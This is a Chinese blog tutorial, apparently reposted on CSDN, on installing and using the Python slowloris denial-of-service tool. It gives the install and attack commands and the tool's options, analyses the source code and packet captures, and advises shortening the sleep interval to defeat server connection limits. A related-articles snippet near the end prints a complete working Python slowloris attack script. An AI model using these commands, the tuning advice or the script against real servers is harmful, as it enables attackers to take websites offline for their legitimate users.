Python3+slowloris安装使用教程

最新推荐文章于 2024-08-10 07:31:50 发布
最新推荐文章于 2024-08-10 07:31:50 发布
阅读量1.4k 收藏 4
点赞数 1
分类专栏: 渗透测试 DDOS 文章标签: ddos
原文链接:https://www.cnblogs.com/lsdb/p/10443875.html
版权

一、说明

今天提到slowloris,这东西看着很眼熟,应该是以前局方打算用来刷竞赛积分的工具。我总觉得DoS没什么意思,但记不得怎么用了所以还是研究一下。

 

二、安装

slowloris就是一个python库直接用pip安装就可以了。但要使用slowloris命令注意要么切换到当前python环境的Scripts目录,要么将该目录加入到环境变量。

pip install slowloris

 

三、使用

最简单的,直接slowloris后加ip或域名即可,如:

slowloris 192.168.1.1

但是默认是150个连接效果可能不明显,可以使用-s参数指定连接数,如1000。具体参数说明如下:

复制代码

(pytest) C:\Users\ls>slowloris -h
usage: slowloris.exe [-h] [-p PORT] [-s SOCKETS] [-v] [-ua] [-x]
                     [--proxy-host PROXY_HOST] [--proxy-port PROXY_PORT]
                     [--https]
                     [host]

Slowloris, low bandwidth stress test tool for websites

positional arguments:
  host                  Host to perform stress test on

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  Port of webserver, usually 80
  -s SOCKETS, --sockets SOCKETS
                        Number of sockets to use in the test
  -v, --verbose         Increases logging
  -ua, --randuseragents
                        Randomizes user-agents with each request
  -x, --useproxy        Use a SOCKS5 proxy for connecting
  --proxy-host PROXY_HOST
                        SOCKS5 proxy host
  --proxy-port PROXY_PORT
                        SOCKS5 proxy port
  --https               Use HTTPS for the requests

复制代码

 

四、原理探究

4.1 DoS原理说明

slowloris本质就只是一个简短的python程序,要弄清原理直接看源代码即可。

代码地址:https://github.com/gkbrk/slowloris/blob/master/slowloris.py

首先是随便请求一个不存在的url建立socket连接:

然后最关键的是如下片段:向所有建立好的socket发送一个”X-a:“的消息,保证socket不被服务器因空闲超时而关闭;有多少个socket不可用就重新创多少个socket;每15秒执行一轮。

 很多文章说slowloris原理是发一个很长的body然后半天没给服务器发完,通过这种形式占用服务器连接。但从代码上看并非如此,slowloris就只是一个tcp全连接的DoS(除非上边的代码不是所说的slowloris)

而且测试中发现,slowloris试图通过”X-a:“存活链接的愿望并没有实现,服务器在响应完之后直接把端口给关闭了。(不知是否取决于所用web服务器)

如下图是上图数据流对应的数据包,当slowloris试图向服务端发送”X-a:“时,服务端直接表示RST。

虽然存活不成功,但slowloris还是能DoS的,因为有”有多少个socket不可用就重新创多少个socket“的机制,slowloris仍能占用服务器资源。

(整个分析过程应该是没问题的,但如果是这样slowloris和tcp全连接DoS有什么区别呢,为什么很多人都夸他这不应该啊,不懂哪里出了问题)

 

4.2 slowloris能建立的连接很少浏览器却能成功访问、仿佛DoS失效问题探究

昨天同事反映说建立不了连接,自己看了一下连接还是可以建的,但是一直都是几个;这边建不了更多连接数据包发送很少很慢,但浏览器却可以访问页面,这就很神奇了。

直接下载源代码进行调试,源代码:https://github.com/gkbrk/slowloris/blob/master/slowloris.py

开始一直以为是目标网站启用了https,而该工具对ssl连接建立处理有问题。但一方面从代码上看不出有什么问题,另一方面从wireshark抓取到的数据包看,http内容是成功发送了的,即上图中的3个6个连接是成功建立了的。没理由同样的代码,一些连接ssl处理有问题一些没有问题,即问题不应该与是http还是https有关系。

继续调试发现在循环建立几个连接之后就抛出异常,抛出异常之后就break,break之后就sleep。抛出异常的原因是SSL连接建立过程中被服务器RST掉了,建立一部分连接后就不允许新建,这种现像明显是服务器端设置了连接个数限制。问题分析到这就比较明白了。

建立连接的个数很少的原因是:循环建立连接过程中,只要出现异常,就不会继续建了。

出现工具建不了新连接浏览器却可以访问的原因是:sleep时间段内工具建立的连接悉数被关闭,就腾出了连接使得浏览器能够成功访问;具体内言浏览器在工具出现except时间前后也是不能访问的,只有在sleep一段时间后(连接被腾出后)浏览器才能成功访问。

总而言之,“DoS失效”这个问题有两个成因,一是服务端做了连接个数限制,二是默认sleep 15秒太长了;前者我们做为客户端无能为力,但可通过后者缩短休眼时间来解决(新版的有--sleeptime参数可直接配置休眼时间,旧版的没有)。

本文转自https://www.cnblogs.com/lsdb/p/10443875.html

lwblovezj
关注
专栏目录
slowloris:低带宽DoS工具。 Slowloris用Python重写
05-11
slowloris.py-Python中的简单slowloris 什么是SlowlorisSlowloris基本上是一种HTTP拒绝服务攻击,会影响线程服务器。 它是这样的: 我们开始发出许多HTTP请求。 我们会定期(每15秒发送一次)发送标头,以保持...
通过slowloris进行DDOS攻击
m0_37570494的博客
09-20 331
2、安装python3,具体安装网上很多;
网络攻防之DDOSslowloris
qq_34597894的博客
10-16 3478
描述: DDOS又称为分布式拒绝服务,全称是Distributed Denial of Service。DDOS本是利用合理的请求造成资源过载,导致服务不可用。比如一个停车场共有100车位,当100车位都停满后,再有车想要停进来,就必须等待已有的车先出去才行。如果已有的车一直不出去,那么停车场的入口就会排气长队,停车场的负荷过载,不能正常工作了,这种情况就是“拒绝服务”。 常...
Slowloris 开源项目使用教程
最新发布
gitblog_00542的博客
08-10 249
Slowloris 开源项目使用教程 slowlorisLow bandwidth DoS tool. Slowloris rewrite in Python.项目地址:https://gitcode.com/gh_mirrors/sl/slowloris 1. 项目的目录结构及介绍 Slowloris 项目的目录结构相对简单,主要包含以下几个部分: slowloris/ ├── LICENSE...
推荐开源项目:Python版Slowloris - 简单而有效的DDoS攻击模拟工具
gitblog_00042的博客
05-12 501
推荐开源项目:Python版Slowloris - 简单而有效的DDoS攻击模拟工具 slowlorisLow bandwidth DoS tool. Slowloris rewrite in Python.项目地址:https://gitcode.com/gh_mirrors/sl/slowloris 项目介绍 慢lorisSlowloris)是一种基于Python的HTTP拒绝服务(DoS...
【网络安全】HTTP Slowloris攻击原理解析
par@ish的博客
12-13 1737
Slowloris是一种针对Web服务器的攻击方式。它利用了服务器在处理HTTP连接时的一些弱点,通过向服务器发送大量的HTTP请求,但在每个请求的头部只发送部分数据并保持连接不断开的方式来耗尽服务器资源。
slowloris.py_SingleandSingle_slowloris_源码
10-02
lowloris is a type of denial of service attack tool which allows a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports.
slowloris_c:用C语言开发的Slowloris工具
05-08
slowloris_c 用C语言开发的Slowloris工具该工具允许实施lowloris攻击。 它是用C语言开发的。工具的用途克隆分支: git clone https://github.com/arn0f/slowloris_ccd slowloris_c编译代码: make启动二进制文件: ....
slowloris:Slowloris-低带宽但贪婪且有害的HTTP客户端
05-04
欢迎使用Slowloris-低带宽但贪婪且有害的HTTP客户端 请注意:这只是Slowloris的一面镜子,我没有创建,参与或以其他方式为Slowloris DoS工具的开发做出贡献。
Orignal-Slowloris-HTTP-DoS:由于http
06-08
Slowloris使用Perl编程语言编写,Perl是一种功能强大的脚本语言,尤其适合处理文本和网络任务。在Perl中,可以方便地创建网络连接并控制它们的状态,这使得它成为实现Slowloris这类攻击的理想选择。 Perl脚本中的...
什么是 Slowloris DDoS 攻击?
ZY_Eliza的博客
01-14 938
Slowloris 是一种拒绝服务攻击程序,它允许攻击者通过打开和维护攻击者和目标之间的许多并发HTTP连接来压倒目标服务器。 Slowloris 攻击是如何工作的? Slowloris 是一种应用层攻击,它利用部分 HTTP 请求进行操作。攻击的功能是打开与目标 Web 服务器的连接,然后尽可能长时间地保持这些连接打开。 Slowloris 不是一类攻击,而是一种特定的攻击工具,旨在允许单台机器在不使用大量带宽的情况下关闭服务器。与消耗带宽的基于反射的DDoS 攻击(例如NTP 放大)不同,这种..
网络安全慢速攻击
Python_paipai的博客
03-23 680
与更传统的蛮力攻击不同,低速缓慢攻击所需的带宽非常小,并且难以防护,因为它们生成的流量很难与正常流量区分开。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
应用层慢速DDoS攻击压力测试工具-SlowHTTPTest
热门推荐
xysoul的专栏
04-21 2万+
下载地址:http://code.google.com/p/slowhttptest/downloads/detail?name=slowhttptest-1.5.tar.gz&can=2&q= SlowHTTPTest是一个可配置的应用层拒绝服务攻击测试攻击,它可以工作在Linux,OSX和Cygwin环境以及Windows命令行接口,可以帮助安全测试人员检验服务器对慢速攻击的
僵尸网络项目代码-DDOS攻击复现-研究报告
LDX的博客
09-19 3670
实践是检验真理的唯一标准,通过本文的两个项目,学者可以更好的体会僵尸网络,继而去研究如何进行有效的防护,并在本项目的基础上进一步的完善,笔者认为可以开发一个针对僵尸网络DDOS攻击的项目,并在本项目上进行实践,验证效果。本文的两个项目都是在本地模拟环境下实现的僵尸网络攻击,若要进行进一步的、更深入的去研究僵尸网络,笔者认为可以在两个项目的基础上进一步完善,扩展到局域网、互联网环境下的僵尸网络,同时僵尸主机也不要仅限于本地端口,可以利用一些简单的漏洞和病毒去操控真实的主机。
Slowloris攻击与防御?--Ecloud(易刻得)专栏
Ecloud的博客
10-27 639
Slowloris攻击也称为 Slowloris拒绝服务攻击,一种慢速连接攻击。 Slowloris是什么? Slowloris也是拒绝服务攻击的一种,常见的DDOS攻击有SYN Flood , UDP Flood , ICMP Flood等。其中SYN Flood是一种非常经典的DDOS攻击。其利用的是TCP协议设计中的缺陷进行攻击的。前篇我们已经提到过,这里暂且不提。而Slowloris攻击则是利用Http协议的漏洞或设计缺陷,直接造成拒绝服务。 起源 Slowloris是在2009..
Slowloris DoS攻击的原理与简单实现
沉在海里的鱼的博客
12-05 3002
Slowloris 攻击是我在李华峰老师的书——《Metasploit Web 渗透测试实战》里面看的,感觉既简单又使用,现在这种攻击是很容易被防护的啦。不过我也不敢真刀实战的去试,只是拿个靶机玩玩罢了。 废话还是写在结语里面吧。(划掉)结语可以不看(划掉) Slowloris 是一种资源消耗类DoS攻击,它利用部分HTTP请求进行操作。也叫做慢速攻击,这里的慢速并不是说发动攻击慢,而是访问一条链接的速度慢。Slowloris攻击的功能是打开与目标Web服务器的连接,然后尽可能
超低成本DDoS攻击来袭,看WAF如何绝地防护
hunanjiushen的博客
02-02 260
网络世界里为人们所熟知的DDoS攻击,多数是通过对带宽或网络计算资源的持续、大量消耗,最终导致目标网络与业务的瘫痪;这类DDOS攻击, 工作在OSI模型的网络层与传输层,利用协议特点构造恶意的请求载荷来达成目标资源耗尽的
slowloris攻击python
03-06
Slowloris攻击是一种利用HTTP协议的漏洞进行的拒绝服务(DoS)攻击。它通过发送大量的半连接(Half-open connections)来耗尽目标服务器的资源,从而使其无法正常响应其他合法用户的请求。 在Python中,可以使用socket库来实现Slowloris攻击。下面是一个简单的示例代码: ```python import socket import random import time def slowloris_attack(target_host, target_port, num_connections): # 创建指定数量的socket连接 sockets = [] for _ in range(num_connections): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(4) s.connect((target_host, target_port)) sockets.append(s) # 发送HTTP请求头部 headers = "GET / HTTP/1.1\r\n" + \ "Host: " + target_host + "\r\n" + \ "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\r\n" + \ "Accept-language: en-US,en,q=0.5\r\n" + \ "Connection: keep-alive\r\n" + \ "Content-Length: 42\r\n" # 持续发送数据 while True: for s in sockets: try: s.send(headers.encode()) except socket.error: sockets.remove(s) # 随机延迟发送时间 time.sleep(random.randint(1, 10)) # 使用示例 target_host = "example.com" target_port = 80 num_connections = 100 slowloris_attack(target_host, target_port, num_connections) ``` 请注意,上述代码仅供学习和研究目的,请勿用于非法用途。进行任何未经授权的攻击是违法行为,可能会导致严重的法律后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值